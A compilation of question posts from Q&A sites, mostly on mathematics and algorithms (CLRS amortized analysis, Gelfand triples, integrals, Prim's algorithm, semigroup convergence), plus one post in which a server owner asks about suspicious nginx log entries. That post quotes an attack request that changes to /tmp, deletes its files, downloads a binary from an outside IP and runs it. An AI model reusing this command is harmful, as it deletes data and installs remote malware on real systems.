## algorithm analysis – \$Phi_1=1\$ or \$Phi_1=2\$ for the dynamic \$text{Table-Insert}\$ , where \$Phi_i\$ is the potential function after \$i\$ th operation, as per CLRS

The following is the section from Introduction to Algorithms by Cormen. et. al. in the Dynamic Tables section.

In the following pseudocode, we assume that $$T$$ is an object representing the table. The field $$table(T)$$ contains a pointer to the block of storage representing the table. The field $$num(T)$$ contains the number of items in the table, and the field $$size(T)$$ is the total number of slots in the table. Initially, the table is empty: $$num(T) = size(T) = 0$$.

$$text{Table-Insert(T,x)}$$

$$1quad text{if size(T)=0}$$

$$2quadquad text{then allocate table(T) with 1 slot}$$

$$3quadquad size(T) leftarrow 1$$

$$4quadtext{if } num(T) =size(T)$$

$$5quadquadtext{then allocate new-table with 2 • size(T) slots}$$

$$6quadquadquadtext{insert all items in table(T) into new-table}$$

$$7quadquadquadtext{free table(T)}$$

$$8quadquadquad table(T) leftarrow new-table$$

$$9quadquadquad size(T) leftarrow 2 • size(T)$$

$$10quad text{insert x into table(T)}$$

$$11quad num(T) leftarrow num(T) + 1$$

For the amortized analysis for the a sequence of $$n$$ $$text{Table-Insert}$$ the potential function which they choose is as follows,

$$Phi(T) = 2.num(T)-size(T)$$

To analyze the amortized cost of the $$i$$th $$text{Table-Insert}$$ operation, we let $$num_i$$ denote the number of items stored in the table after the $$i$$ th operation, $$size_i$$ denote the total size of the table after the $$i$$ th operation, and $$Phi_i$$ denote the potential after the $$i$$th operation.

Initially, we have $$num_0 = 0, size_0 = 0$$, and $$Phi_0 = 0$$.

If the $$i$$ th Table-Insert operation does not trigger an expansion, then we have $$size_i = size_{i-i}$$ and $$num_i=num_{i-1}+1$$, the amortized cost of the operation is $$widehat{c_i}$$ is the amortized cost and $$c_i$$ is the total cost.

$$widehat{c_i}=c_i+Phi_i- Phi_{i-1} = 3 text{ (details not shown)}$$

If the $$i$$ th operation does trigger an expansion, then we have $$size_i = 2 . size_{i-1}$$ and $$size_{i-1} = num_{i-1} = num_i —1$$,so again,

$$widehat{c_i}=c_i+Phi_i- Phi_{i-1} = 3 text{ (details not shown)}$$

Now the problem is that they do not make calculations for $$widehat{c_1}$$ the situation for the first insertion of an element in the table (line 1,2,3,10,11 of code only gets executed).

In that situation, the cost $$c_1=1$$, $$Phi_0=0$$ and $$num_1=size_1=1 implies Phi_1 = 2.1-1 =1$$

We see that $$Phi_1=1 tag 1$$

So, $$widehat{c_1}=c_1+Phi_1-Phi_0=2$$

But the text says that the amortized cost is $$3$$, (I feel they should have said the amortized cost is at most $$3$$, from what I can understand)

Moreover in the plot below,

The text represents graphically the $$Phi_1=2$$ which sort of contracts $$(1)$$, but as per the graph if we assume $$Phi_1=2$$ then $$widehat{c_i}=3, forall i$$

I do not quite get where I am making the fault.

## fa.functional analysis – A weaker weak time derivative than the one arising from Gelfand triples?

Let $$V subset H subset V^*$$ be a Gelfand/evolution triple where $$V$$ is a reflexive, separable Banach space and $$H$$ is a Hilbert space which has been identified with its dual.

In the context of evolution equations based around the above Gelfand triple, does it ever make sense to think of functions (such as solutions of PDEs) $$ucolon (0,T) to V$$ with weak time derivative
$$u’colon (0,T) to Z$$
where $$Z supset V^*$$ is a larger space than $$V^*$$ (and belonging only to this space and not also to $$V^*$$, in order not to make this question trivial)?

Note that the weak time derivative can be defined for in such a space by the formula
$$int_0^T u(t)varphi'(t) = -int_0^T u'(t)varphi(t) quad forall varphi in C_c^infty(0,T)$$
with the equality in $$Z$$.

The question is about when working in the context of a Gelfand triple for evolution equations (eg. parabolic PDEs), whether it makes sense to consider even weaker time derivatives than those usually used with values in $$V^*$$. AFAIK the Gelfand triple is needed precisely to set up the weak time derivative and appropriate properties.

## real analysis – Evaluate the integral \$int_{0}^{pi}!{{rm e}^{x}}sqrt {sin left( x right) },{rm d}x\$.

Question inspired by Does \$int _0^{pi }e^xsin ^nleft(xright):mathrm{d}x\$ have a closed form?

Prove or disprove:
$$int_{0}^{pi}!{{rm e}^{x}}sqrt {sin left( x right) },{rm d}x= {frac {{pi}^{3/2}{{rm e}^{pi/2}}}{2^{3/2};Gamma left( 5/4+ i/2 right) Gamma left( 5/4-i/2 right) }}$$

(1) Maple says it is correct to 100 decimals.

(2) According to the cited problem,
$$int_{0}^{pi}!{{rm e}^{x}} left( sin left( x right) right) ^{ n},{rm d}x={frac {pi,{{rm e}^{pi/2}}Gamma left( n+1 right) }{{2}^{n}Gamma left( n/2+1+i/2 right) Gamma left( n/2+1-i/2 right) }}$$
holds for all nonnegative integers $$n$$.
May we conjecture that it holds for all
complex numbers $$n$$ except the negative integers?

## real analysis – How to find the bounds of a volume integral?

Im studying on integrating over volumes and I don’t know how to set the bounds in this exercise:

Let $$Omega := { (x,y,z) in mathbb{R}^3 | frac{x^2}{4} + y^2 + frac{z^2}{9} <1 }$$ and $$tilde{x} = (x,y,z)$$.

I want to show the following integral

begin{align} int_Omega (6xz + 2y +3z^2) text{d} tilde{x}. end{align}

I recon its best to start off with the first integrand, using Fubini:

begin{align} int_Omega 6xz text{d} tilde{x} = 6 int_Omega xz text{d}x text{d}y text{d}z \ 6 int_?^? z int_?^? int_?^? x text{d}x text{d}y text{d}z, end{align}

but I don’t know how to define the bounds for each of the integrals. Obviously it depends on $$Omega$$, and its easy to see that $$Omega$$ defines a contorted 3D-ellipsoid. My intuition is somehow using sphere coordinates, but how exactly can I set the bounds?

Cheers

## calculus and analysis – Solving integral involving absolute value of a vector

I am trying to integrate the following in mathematica:
$$int_0^r frac{exp(-k_d(|vec{r}-vec{r_j}|+|vec{r}-vec{r_i}|)}{|vec{r}-vec{r_j}|times|vec{r}-vec{r_i}|}r^2dr$$.
I have first defined, the following functions,
$$vec p(x,y,z)= (x-x_j)hat i + (y-y_j)hat j+(z-z_j)hat k$$
Similarly,
$$vec q(x,y,z)= (x-x_i)hat i + (y-y_i)hat j+(z-z_i)hat k$$.
And,
$$vec r(x,y,z)=xhat i + yhat j+zhat k$$
Then I clicked the integration symbol in the classroom assistant panel and typed the integrand in the $$expr$$ portion. While typing this, I have used $$Abs$$ to take modulus of the functions $$vec p(x,y,z)$$ and $$vec q(x,y,z)$$ . I have included the limits as $$0$$ to $$Abs(r)$$ and the $$var$$ as $$r$$ in the integration symbol.
But when I press( Shift + Enter ) no output value is shown . Can anyone tell me where I have made mistake ?

## runtime analysis – What is considered an asymptotic improvement for graph algorithms?

Lets say we are trying to solve some algorithmic problem A that is dependent on input of size n.
we say algorithm B that runs in time T(n), is asymptotically better than algorithm C which runs in time G(n) if we have:
G(n) = O(T(n)), but T(n) is not O(G(n)).

My question is related to the asymptotic running time of graph algorithms, which is usually dependent on |V| and |E|.
Specifically I want to focus on Prim’s algorithm. If we implement the priority queue with a binary heap the run-time would be O(ElogV). With Fibonacci heap we could get a run-time of O(VlogV + E).

My question is do we say that O(VlogV + E) is asymptotically better than O(ElogV)?

Let me clarify: I know that if the graph is dense the answer is yes. But if E=O(V) both of the solutions are the same.
I am more interested in what is usually defined as an asymptotic improvement in the case we have more than one variable, and even worse – the variables are not independent (V-1<=E<V^2, since we assume the graph is connected for Prim’s algorithm).

Thanks!

## log analysis – Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

``````170.81.46.70 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - -  "GET / HTTP/1.1" 301 169 "http://(IP OF MY SERVER):80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - -  "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - -  "GET / HTTP/1.1" 400 157 "-" "-"
``````

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

## Pull the limit inside the infinit serie in complex analysis?

Let $$f: U mapsto Bbb C$$ a holomorphic function and $$U$$ an open set of the complex plane. We have
$$f(z)=(z-z_0)^msum_{k=0}^{infty}a_{k+m}(z-z_0)^k$$
with $$mgeq 1$$. In my course, it is written that the right hand side converges on some ball $$B_r(z_0)$$ thus :
$$lim_{zrightarrow z_0}frac{f(z)}{(z-z_0)^m}=lim_{zrightarrow z_0}sum_{k=0}^{infty}a_{k+m}(z-z_0)^k=a_m$$
I don’t understand why we can put the limit inside the infinit serie… Is it a result from complex analysis ?

## fa.functional analysis – \$|(A_n-z)^{-1} – (A-z)^{-1}|to 0;Rightarrow; |e^{-tA_n}-e^{-tA}|to 0\$ for general \$C_0\$ semigroups?

In short, the question is whether norm-resolvent convergence implies operator-norm convergence of the assocoated semigroups. More specifically, assume the following:

1. The $$A_n$$ generate contraction semigroups for all $$n$$,
2. $$A$$ generates a contraction semigroup,
3. One has $$|(A_n+1)^{-1} – (A+1)^{-1}|to 0$$ in operator norm.

Then, can one get anything better than strong convergence for the associated semigroups (preferably operator norm convergence for some fixed t>0)?

The answer is relatively simple for analytic semigroups, since in that case one has an integral formula that expresses the semigroup in terms of the resolvent. For general $$C_0$$ semigroups, it’s much less obvious…

## real analysis – Functions with a Jacobian whose columns are orthogonal

I am interested in functions whose Jacobian has orthogonal columns; i.e. if $$mathbf{f}(cdot):mathbb{R}^{n} rightarrow mathbb{R}^{n}$$ is a function where $$mathbf{f}(mathbf{x})=(f_1(mathbf{x}), f_2(mathbf{x}),~dots, f_n(mathbf{x}))^{rm T}$$, I am looking for all such functions that:

$$forall~mathbf{x}inmathbb{R}^{n}quad&quad 1leq i,jleq n:quad big(nabla f_i(mathbf{x})big)^{rm T}nabla f_j(mathbf{x}) = begin{cases}0~&:ineq j\g_{i}(mathbf{x})&:i=j end{cases}$$

A similar question has been asked here. As I understood, in Liouville’s theorem for conformal maps all the diagonal elements of the Jacobian $$nablamathbf{f}(mathbf{x})$$ are the same. Here, however, I am looking for a generalized case where the diagonal elements are not necessarily the same. Do we have something similar to Liouville’s theorem for this case?

Thanks.